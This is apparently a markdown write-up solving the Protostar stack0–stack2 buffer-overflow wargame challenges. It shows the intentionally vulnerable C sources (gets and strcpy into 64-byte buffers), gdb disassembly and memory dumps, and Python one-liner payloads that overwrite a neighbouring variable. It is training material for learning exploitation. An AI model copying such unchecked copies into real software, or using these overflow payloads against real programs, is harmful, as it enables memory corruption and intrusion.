Skip to content

Latest commit

 

History

History
247 lines (218 loc) · 7.35 KB

16.Stack_Variable_Overwrite.md

File metadata and controls

247 lines (218 loc) · 7.35 KB
Raw

Stack : Variable Overwrite

Protostar Challenges

$ ls /opt/protostar/bin
final0  format0  format3  heap1  net0  net3    stack1  stack4  stack7
final1  format1  format4  heap2  net1  net4    stack2  stack5
final2  format2  heap0    heap3  net2  stack0  stack3  stack6

Stack0 [ Description ] source.c

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>

int main(int argc, char **argv)
{
  volatile int modified;
  char buffer[64];

  modified = 0;
  gets(buffer);

  if(modified != 0) {
      printf("you have changed the 'modified' variable\n");
  } else {
      printf("Try again?\n");
  }
}
  • two local variables modified and buffer
  • we have user input for buffer and let's analyse with gdb
$ gdb -q ./stack0
Reading symbols from /opt/protostar/bin/stack0...done.
(gdb) set disassembly-flavor intel
(gdb) disas main
Dump of assembler code for function main:
0x080483f4 <main+0>:    push   ebp
0x080483f5 <main+1>:    mov    ebp,esp
0x080483f7 <main+3>:    and    esp,0xfffffff0
0x080483fa <main+6>:    sub    esp,0x60
0x080483fd <main+9>:    mov    DWORD PTR [esp+0x5c],0x0
0x08048405 <main+17>:   lea    eax,[esp+0x1c]
0x08048409 <main+21>:   mov    DWORD PTR [esp],eax
0x0804840c <main+24>:   call   0x804830c <gets@plt>
0x08048411 <main+29>:   mov    eax,DWORD PTR [esp+0x5c]
0x08048415 <main+33>:   test   eax,eax
0x08048417 <main+35>:   je     0x8048427 <main+51>
0x08048419 <main+37>:   mov    DWORD PTR [esp],0x8048500
0x08048420 <main+44>:   call   0x804832c <puts@plt>
0x08048425 <main+49>:   jmp    0x8048433 <main+63>
0x08048427 <main+51>:   mov    DWORD PTR [esp],0x8048529
0x0804842e <main+58>:   call   0x804832c <puts@plt>
0x08048433 <main+63>:   leave
0x08048434 <main+64>:   ret
End of assembler dump.

setting breakpoints

(gdb) b *main+9
Breakpoint 1 at 0x80483fd: file stack0/stack0.c, line 10.
(gdb) b *main+29
Breakpoint 2 at 0x8048411: file stack0/stack0.c, line 13.

First Breakpoint

(gdb) run
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /opt/protostar/bin/stack0 AAAA

Breakpoint 1, main (argc=2, argv=0xbffffd64) at stack0/stack0.c:10
10      in stack0/stack0.c
(gdb) ni
11      in stack0/stack0.c
(gdb) x/32x $esp
0xbffffc50:     0x00000000      0x00000001      0xb7fff8f8      0xb7f0186e
0xbffffc60:     0xb7fd7ff4      0xb7ec6165      0xbffffc78      0xb7eada75
0xbffffc70:     0xb7fd7ff4      0x08049620      0xbffffc88      0x080482e8
0xbffffc80:     0xb7ff1040      0x08049620      0xbffffcb8      0x08048469
0xbffffc90:     0xb7fd8304      0xb7fd7ff4      0x08048450      0xbffffcb8
0xbffffca0:     0xb7ec6365      0xb7ff1040      0x0804845b      0x00000000
0xbffffcb0:     0x08048450      0x00000000      0xbffffd38      0xb7eadc76
0xbffffcc0:     0x00000002      0xbffffd64      0xbffffd70      0xb7fe1848
(gdb) x $esp+0x5c
0xbffffcac:     0x00000000

buffer

(gdb) c
Continuing.
AAAA

Breakpoint 2, main (argc=2, argv=0xbffffd64) at stack0/stack0.c:13
13      in stack0/stack0.c
(gdb) x/32x $esp
0xbffffc50:     0xbffffc6c      0x00000001      0xb7fff8f8      0xb7f0186e
0xbffffc60:     0xb7fd7ff4      0xb7ec6165      0xbffffc78      0x41414141
0xbffffc70:     0xb7fd7f00      0x08049620      0xbffffc88      0x080482e8
0xbffffc80:     0xb7ff1040      0x08049620      0xbffffcb8      0x08048469
0xbffffc90:     0xb7fd8304      0xb7fd7ff4      0x08048450      0xbffffcb8
0xbffffca0:     0xb7ec6365      0xb7ff1040      0x0804845b      0x00000000
0xbffffcb0:     0x08048450      0x00000000      0xbffffd38      0xb7eadc76
0xbffffcc0:     0x00000002      0xbffffd64      0xbffffd70      0xb7fe1848

Overflow to modified

[ Pattern idea from LiveOverflow ]

(gdb) run
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /opt/protostar/bin/stack0 AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOO

Breakpoint 1, main (argc=2, argv=0xbffffd24) at stack0/stack0.c:10
10      in stack0/stack0.c
(gdb) c
Continuing.
AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUU

Breakpoint 2, main (argc=0, argv=0xbffffd24) at stack0/stack0.c:13
13      in stack0/stack0.c
(gdb) x/32x $esp
0xbffffc10:     0xbffffc2c      0x00000001      0xb7fff8f8      0xb7f0186e
0xbffffc20:     0xb7fd7ff4      0xb7ec6165      0xbffffc38      0x41414141
0xbffffc30:     0x42424242      0x43434343      0x44444444      0x45454545
0xbffffc40:     0x46464646      0x47474747      0x48484848      0x49494949
0xbffffc50:     0x4a4a4a4a      0x4b4b4b4b      0x4c4c4c4c      0x4d4d4d4d
0xbffffc60:     0x4e4e4e4e      0x4f4f4f4f      0x50505050      0x51515151
0xbffffc70:     0x52525252      0x53535353      0x54545454      0x55555555
0xbffffc80:     0x00000000      0xbffffd24      0xbffffd30      0xb7fe1848
(gdb) c
Continuing.
you have changed the 'modified' variable

Program received signal SIGSEGV, Segmentation fault.
0x55555555 in ?? ()

GDB Outside

$ python -c 'print "AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUU"' | ./stack0
you have changed the 'modified' variable
Segmentation fault

Stack 1 [ Description ]

source.c

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
  volatile int modified;
  char buffer[64];

  if(argc == 1) {
      errx(1, "please specify an argument\n");
  }

  modified = 0;
  strcpy(buffer, argv[1]);

  if(modified == 0x61626364) {
      printf("you have correctly got the variable to the right value\n");
  } else {
      printf("Try again, you got 0x%08x\n", modified);
  }
}
  • variable overwrite with specific value

Testing with pattern

$ ./stack1 $(python -c 'print "AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUU"')
Try again, you got 0x51515151
Segmentation fault

what is 51?

(gdb) print/c 0x51
$4 = 81 'Q'

Endianess

$ ./stack1 $(python -c 'print "AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPP"+"\x61\x62\x63\x64"')
Try again, you got 0x64636261

Final

$ ./stack1 $(python -c 'print "AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPP"+"\x64\x63\x62\x61"')
you have correctly got the variable to the right value

Stack 2 [ Description ]

source.c

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
  volatile int modified;
  char buffer[64];
  char *variable;

  variable = getenv("GREENIE");

  if(variable == NULL) {
      errx(1, "please set the GREENIE environment variable\n");
  }

  modified = 0;

  strcpy(buffer, variable);

  if(modified == 0x0d0a0d0a) {
      printf("you have correctly modified the variable\n");
  } else {
      printf("Try again, you got 0x%08x\n", modified);
  }

}
  • variable overwrite with specific value and understand environment variable

Our input is at GREENIE in environment variable

$ GREENIE="AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUU" && ./stack2
Try again, you got 0x51515151
Segmentation fault

Final Payload

$ GREENIE=$(python -c 'print "AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPP"+"\x0a\x0d\x0a\x0d"') && ./stack2
you have correctly modified the variable